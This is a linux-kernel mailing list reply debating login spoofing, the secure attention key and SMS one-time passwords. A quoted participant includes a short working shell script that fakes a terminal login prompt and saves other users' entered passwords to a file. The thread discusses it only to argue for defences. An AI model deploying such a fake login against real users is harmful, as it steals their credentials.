> > You have a fundamental flaw in your assumptions, since you don't take into
> > account the fact that unless the security of the system is very badly
> > messed up already, if a user is able to substitute his own program for
> > the normal login/getty, he can also exchange his programs for whatevery
> > else you add to give better "security".
>
> What about just starting (as evil_user, who has an account) the following,
> hiding behind a corner, and wait for another user?
>
> #!/bin/sh
> #
> echo -n "`uname -n` login: "
> read LOGIN
> echo -n "Password: "
> read PW
> echo $LOGIN $PW >> ~/sneaked_passwords.txt
> chmod 0600 ~/sneaked_passwords.txt
> echo "Login incorrect"
> sleep 1
> logout
> (of course, this has to be a text terminal)
Press SAK and be done.
> > <asbestos>
> > The reason why people said your suggestion was the "NT way", is that it
> > makes life harder to everyone trying to use the system, without adding to
> > the actual security of the system.
> > </asbestos>
>
> the most secure way of logging in I have seen so far is the following (I
> helped set it up, kind of, in a firm I jobbed during holidays).
>
> Everyone has a pager or a manager tamagotchi (mobile phone). Logging in
> makes /bin/login send a random string (like from 'pwgen') as e-mail to an
> email<->SMS gateway. A couple seconds later this string pops up on their
> pagers, they enter it. THEN they enter their own (private)
> password.
Ok, so my fake login has to send them email. You _still_ has to press SAK.
> Of course, you will have to have your pager with you, but you get used to
> that. One big advantage is that you will always be warned at once if someone
> tries to log into your account, better yet _from where_ if the terminal id
> is included in this one time SMS password.
Pavel
-- I'm really pavel@atrey.karlin.mff.cuni.cz. Pavel Look at http://atrey.karlin.mff.cuni.cz/~pavel/ ;-).- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.tux.org/lkml/